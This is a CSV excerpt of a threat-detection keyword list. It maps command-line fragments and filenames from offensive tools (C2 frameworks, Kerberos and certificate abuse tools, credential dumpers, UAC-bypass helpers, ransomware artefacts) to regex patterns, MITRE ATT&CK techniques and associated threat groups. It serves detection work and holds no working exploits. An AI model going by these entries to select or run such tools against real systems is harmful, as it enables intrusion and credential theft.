"* -c process_kill --process *",".{0,1000}\s\-c\sprocess_kill\s\-\-process\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","511"
"* -c service_mod --execute create -s *",".{0,1000}\s\-c\sservice_mod\s\-\-execute\screate\s\-s\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","513"
"* -c upload --fileto * --file *",".{0,1000}\s\-c\supload\s\-\-fileto\s.{0,1000}\s\-\-file\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","514"
"* -c vacant_system * -u *",".{0,1000}\s\-c\svacant_system\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","515"
"* -c -w methods.txt -p 127.0.0.1*",".{0,1000}\s\-c\s\-w\smethods\.txt\s\-p\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","516"
"* -c -z range*1-10 --hc=BBB http*",".{0,1000}\s\-c\s\-z\srange.{0,1000}1\-10\s\-\-hc\=BBB\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","517"
"* c:\\Temp\\lua.log*",".{0,1000}\sc\:\\\\Temp\\\\lua\.log.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","518"
"* C:\ProgramData\sh.txt*",".{0,1000}\sC\:\\ProgramData\\sh\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","519"
"* C:\temp\w.log*",".{0,1000}\sC\:\\temp\\w\.log.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","520"
"* C:\Users\Public\build.bat*",".{0,1000}\sC\:\\Users\\Public\\build\.bat.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","521"
"* C:\Users\Public\build.vbs*",".{0,1000}\sC\:\\Users\\Public\\build\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","522"
"* C:\Users\Public\DtcInstall.txt*",".{0,1000}\sC\:\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","523"
"* c2 add *",".{0,1000}\sc2\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","526"
"* c2 start http *",".{0,1000}\sc2\sstart\shttp\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","527"
"* c2_server.py*",".{0,1000}\sc2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","528"
"* c2profile.Name*",".{0,1000}\sc2profile\.Name.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","529"
"* -c2server *",".{0,1000}\s\-c2server\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","530"
"* --CaCertPath *.pfx --CaCertPassword *",".{0,1000}\s\-\-CaCertPath\s.{0,1000}\.pfx\s\-\-CaCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","532"
"* cachedump.py*",".{0,1000}\scachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","533"
"* CACTUSTORCH.cna*",".{0,1000}\sCACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","534"
"* CallDirect.py*",".{0,1000}\sCallDirect\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","535"
"* --callobf-config *",".{0,1000}\s\-\-callobf\-config\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","536"
"* --callobf-path-x64 *",".{0,1000}\s\-\-callobf\-path\-x64\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","537"
"* --callobf-path-x86 *",".{0,1000}\s\-\-callobf\-path\-x86\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","538"
"* CallStranger.py*",".{0,1000}\sCallStranger\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","539"
"* camhacker *",".{0,1000}\scamhacker\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","540"
"* camhacker:/CamHacker*",".{0,1000}\scamhacker\:\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","541"
"* can now impersonate users on * via S4U2Proxy*",".{0,1000}\scan\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","542"
"* Can search all Teams messages in all channels that are readable by the current user*",".{0,1000}\sCan\ssearch\sall\sTeams\smessages\sin\sall\schannels\sthat\sare\sreadable\sby\sthe\scurrent\suser.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Framework","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","543"
"* canisrufus.py*",".{0,1000}\scanisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","544"
"* -caplet *.cap",".{0,1000}\s\-caplet\s.{0,1000}\.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","545"
"* CarSeat.py *",".{0,1000}\sCarSeat\.py\s.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","546"
"* cassandra-brute.nse*",".{0,1000}\scassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","547"
"* cassandra-info.nse*",".{0,1000}\scassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","548"
"* catspin.sh *",".{0,1000}\scatspin\.sh\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","549"
"* CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL*",".{0,1000}\sCC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","550"
"* --ccache-ticket *",".{0,1000}\s\-\-ccache\-ticket\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","551"
"* cccam-version.nse*",".{0,1000}\scccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","552"
"* ccmpwn.py*",".{0,1000}\sccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","553"
"* Celesty Binder\Celesty.exe*",".{0,1000}\sCelesty\sBinder\\Celesty\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","554"
"* --certdump *",".{0,1000}\s\-\-certdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","555"
"* certipy-ad*",".{0,1000}\scertipy\-ad.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","556"
"* changepw * /ticket:*",".{0,1000}\schangepw\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","557"
"* chaos.exe *",".{0,1000}\schaos\.exe\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","558"
"* charlotte.cpp*",".{0,1000}\scharlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","559"
"* charlotte.dll *",".{0,1000}\scharlotte\.dll\s.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","560"
"* CharSubroutine-Macro.xls*",".{0,1000}\sCharSubroutine\-Macro\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","561"
"* checkRoot.ps1*",".{0,1000}\scheckRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","562"
"* -CheckShareAccess -Verbose*",".{0,1000}\s\-CheckShareAccess\s\-Verbose.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","563"
"* CheckSMBSigning.ps1*",".{0,1000}\sCheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","564"
"* --check-tor *",".{0,1000}\s\-\-check\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","565"
"* -ChildPath *fodhelper.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}fodhelper\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","566"
"* -ChildPath *sdclt.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}sdclt\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SDCLTBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","567"
